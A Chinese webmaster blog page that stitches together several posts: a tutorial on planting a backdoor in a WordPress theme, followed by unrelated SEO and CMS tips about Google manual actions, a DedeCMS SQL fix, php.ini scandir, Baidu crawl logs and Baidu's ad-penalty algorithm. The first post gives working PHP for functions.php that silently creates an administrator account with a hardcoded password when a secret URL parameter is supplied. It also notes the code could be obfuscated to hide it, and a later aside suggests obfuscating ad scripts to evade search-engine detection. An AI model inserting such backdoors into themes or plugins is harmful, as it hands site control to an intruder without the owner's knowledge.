如何在WordPress主题中创建后门

是不是在很多场合听说过后门(Backdoor),特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界。其实程序的后门留我们根本不远,其实你用的很多软件或者程序都是有后门的,下面给大家演示的一个很简单的案例,就可以给 WordPress 站点留下后门,获取管理员权限,当然这只是一篇教学文章,个人强烈你在使用 WordPress 帮人作网站的时候,千万不要这样做。

 

add_action( ‘wp_head’, ‘my_backdoor’ );

function my_backdoor() {

if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {

require( ‘wp-includes/registration.php’ );

if ( !username_exists( ‘backdoor’ ) ) {

$user_id = wp_create_user( ‘backdoor’, ‘pa55w0rd!’ );

$user = new WP_User( $user_id );

$user->set_role( ‘administrator’ );

}

}

}

比如在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 http://www.yoursitename.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。

如果在把上面这段代码加密一下,很多用户就根本不知道这段代码是做什么的,所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件,说不定就给你的站点安装了一个后门。

搜索引擎人工干预是真的,谷歌站长工具人工干预通知

谷歌逆天之举经常发生,最近在站长工具突然推出一个手动操作通知,可以查看网站是否被谷歌人工干预,这在所有搜索引擎中应该是绝无仅有的,如果该功能得到广大站长认可,百度,360以及搜狗可能也会跟进推出.

很多站长反应,希望了解自己的网站是否被人工处理,为了满足这一要求,谷歌站长工具中增加了一个新功能:手动操作查看器。该查看器中会显示手动网站处理小组所采取操作的相关信息,这些操作会直接影响网站在 Google 网页搜索结果中的排名。

 

谷歌该举动意味着:

1,Google承认人工处理网站,如果Google人工删除了你的站,你会收到通知。

2,违反Google网站质量指南后,重新审核请求流程变得更加精简。

Google说到:

最近对Google的索引进行的分析表明,在Google已查看的所有网站中,因垃圾网站而被手动删除的网站远远不到 2%。

如果您看到下面的消息:

该网站上没有任何针对垃圾网页执行的手动操作。

则表明您的网站没有因垃圾网站原因而导致的手动删除或直接降位操作。

现在大家可以随时查看网站是否因为违反质量指南而被处理。这一举措能够让大多数站长放心,让少数被处理的网站迅速排查问题,要试用该功能,请登录网站站长工具,然后点击“搜索流量”下的“手动操作”链接。

更深层次的意思是谷歌的技术已经到瓶颈,必须要人工参与才能解决某些问题.

织梦DEDECMS文章编辑器标题字数限制解决办法

织梦的后台限制标题字数是60个字符,但是有些文章标题太长了直接被截断,导致标题变的不可读,如何解决这个问题呢?

方法很简单,只需两步就可以搞定织梦DedeCms的文章标题字数的限制:
1、登陆织梦后台选择
系统 -> 其它选项 -> 文档标题最大长度(改此参数后需要手工修改数据表)
修改为需要设置的标题最大长度,默认是60,一般修改成90
2、在dedecms后台,系统 SQL命令行工具 中运行
alter table dede_archives change title title varchar(90)
其中的varchar(90) 中的数字90可以修改为你系统设置中填写的最大标题长度
点击确定,出现成功执行1个SQL语句!

OK,完美解决织梦DEDECMS文章编辑器标题字数限制问题!

解决wordpress无法显示、安装新主题的问题

最近把本站换到vps上之后发现wordpress以前安装的主题都无法显示了,相当郁闷,不知道是那里出现问题了

后台只显示:

You only have one theme installed right now. Live a little! You can choose from over 1,000 
free themes in the WordPress.org Theme Directory at any time: just click on the Install Themes 
tab above.

修改了文件夹的权限也完全没有显示,于是只好求助谷歌百度

原来是php禁用了scandir函数,用winscp打开 /usr/local/php/etc/php.ini 文件,搜索scandir,删除掉就可以了,记得去掉后面的逗号.

重启php服务,刷新下主题管理界面,OK,可以了!

 

SEO重中之重-网站日志分析

很多所谓做seo的总是让我感觉很可笑,问的问题也很蛋疼,比如学seo要不要学html,要不要学php,要不要学网站建设…..好像随便看点东西就是做seo的了.昨天和一个seowhy的人聊天,一看他的网站,根本没有收录,于是我让他看下网站日志,分析一下为何不收录,突然这人给我来一句”网站日志是什么?”,尼美啊,写了整站的seo文章竟然不知道网站日志是什么?

网站日志应该说是做seo的重中之重了,因为做seo就是研究收录,研究客户,研究蜘蛛,网站日志就记载了访问你网站的蜘蛛和客户的访问记录,如果你还不知道查看自己网站的日志,那请不要再往下看了,请搜索一下网站日志如何查看

网站日志一般记载了访问IP,访问时间,访问页面,访问抓取返回代码,访问文件大小,访问浏览模式(蜘蛛标示)

如下所示就是百度蜘蛛爬取兔子窝博客的一条记录:

123.125.71.77 – – [26/Jul/2013:00:26:03 -0700] “GET blog.xmaro.com HTTP/1.1” 200 30233 “-” “Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)”

该标示说明123.125.71.77这个百度蜘蛛在2013年7月26日0点26分3秒抓取了本站首页,本站首页大小是30KB

HTTP/1.1″ 200 30233 这里返回200说明是成功抓取了,如果出现304说明蜘蛛已经爬取过一次,文章没有修改过,所以返回304,如果出现404记录,说明蜘蛛没有抓取到内容,你应该检查下这个抓取的页面是否还存在,如果一个网站出现大量404页面,权重是会受到很大影响的.

如果你发现文章没有收录,可以查看网站日志搜索这篇文章是否被蜘蛛爬取过,如果没有爬取说明蜘蛛还没有来,你要去勾引蜘蛛了,还可以通过蜘蛛的ip来分析网页的权重分布,这里就不说了,下次继续分享

网站文章秒收,第二天被删除是怎么回事?

一般做网站的朋友会发现一些新网站的文章刚发出来就秒收,而且排名还不错,但是第二天就出现被删除的情况,这是怎么回事呢?兔子窝seo在这里分析了一下.

第一种情况就是文章质量权重影响,刚收录就放出来的文章一般是原创度比较高的文章,百度会暂时给这篇文章一个比较高的排名,如果在这段时间出现搜索点击的话,说明这篇文章提供了搜索者需要的内容,然后百度在再次抓取结合整站权重计算后会直接给予该篇文章比较好的权重排名,如果这段时间没有搜索者点击这篇文章,百度在再次抓取后结合整站权重计算后给予权重,如果整站的权重不是很高的话,很容易被百度删除快照或者降低排名.

第二种情况是文章发表后被其他权重高的网站转载,因为蜘蛛时间差的问题,很容易造成本站文章对比后被认为是抄袭而不收录.

第三种情况可能是服务器问题,百度一般会多次抓取网站的文章,如果服务器在百度抓取的时候出现问题,导致大量的404页面出现,百度会认为你这篇文章已经删除,相对应网站快照也就被删除掉了

其他的情况暂时兔子窝也没有发现,欢迎广大同仁多提提意见!

屏蔽百度结束

前一段为了做权重恢复测试屏蔽了百度一段时间,经过快2个月的屏蔽,百度已经把本站的收录完全删掉了

以前网站被K用这个方法一周就恢复了,现在不知道效果怎么样?

今天开始测试权重是否能恢复的问题

时间:两周

文章更新频率:2篇/日(原创+伪原创)

修改主题:首页多余链接nofollow

外链:社交类网站推广

关键字整理

首先恢复网站的整体收录,检查蜘蛛爬取情况,修改原创度低的文章,整理栏目页关键词描述

 

最近做一个网站权重恢复测试

本站百度权重从过完年开始已经降权,所有关键词排名都掉了,而且搜索网站标题也找不到网址,但是原创的新文章还是会收录,但是搜索文章标题也没有排名,应该是整站都被降权了

bdlogo

分析了一段时间做的工作:

网站文章基本是原创,部分转载,这个影响不大

外链建设基本是论坛签名和友情链接,影响应该也不大,没有买过链接

首页快照基本隔日更新,百度抓取的有些太勤快了,应该也没什么影响

有问题的部分:

去年以前刷过一段百度点击,这个可能是关键

主题换的太快了,有一定的影响

网站服务器有时候会宕机,也有可能是关键

解决方案:

现在本站网址应该是已经进了黑名单,百度现在调整的策略是不K站,所以这次测试就是用robots屏蔽百度一个月,同时调整网站服务器,同时不再更新文章,文章全部调整到另一个博客更新.

因为不想直接停掉站,所以暂时只能用这种方法来测试,期待一个月后的效果.

 

百度石榴算法—弹窗广告毁灭者

百度新的“石榴算法”准备在24号发布了,目的主要是打击低质量页面,第一期目标是弹窗广告和类似顶部js文件广告,一般这种广告都是js文件,猜测百度也要开始抓取js文件了,其实也可以混淆js文件来避开百度的检测,另外一种就是页面图片抓取对比快照图片,仅是猜测,筒子们可以做下试验。

作者:百度网页搜索反作弊团队       发布时间:2013年5月17日

亲爱的站长朋友们:

大家好!

一直以来,我们本着为用户提供最优质直接的信息的原则,不断优化算法、升级系统。保护优质页面与打压低质页面是一直都运用的两种方式。

本次想向各位站长朋友传达,我们将针对低质量页面将进行一系列调整,我们称之为石榴算法。

第一期将对此类页面生效:含有大量妨碍用户正常浏览的恶劣广告的页面,尤其以弹出大量低质弹窗广告、混淆页面主体内容的垃圾广告页面为代表。

从整个互联网生态环境看,泛滥的低质量广告越来越多的被加诸于大量网站的各个角落,无处不在,这已经严重影响了正常用户的浏览体验。想象一下,当你打开一个网页,看到的不是感兴趣的内容反而是一个个垃圾弹窗广告或者混淆、掩盖住主体内容的大面积广告,你的感受如何?不言自明。

因此本次算法上线后,我们将会看到低质广告少、无弹窗的优质页面排序有所提升,当然,前提是主体内容有价值。相应的含有恶劣弹窗、大量混淆页面主体内容等垃圾广告的页面排序会大幅下降。

这是搜索引擎尊重用户的必然选择,也是着眼于净化互联网整体环境的必然趋势。

最后,希望站长能够从用户角度出发往长远考虑,在不影响用户体验的前提下合理放置广告,赢得用户的长期青睐才是一个网站发展壮大的基础。

提醒:石榴算法第一期针对含有大量低质弹窗广告及大量混淆页面主体内容等垃圾广告的页面算法升级,将会在一周之后正式上线,希望广大站长在这一周内尽快检查网站中的广告情况,若存在上述说的情况,请及时进行处理。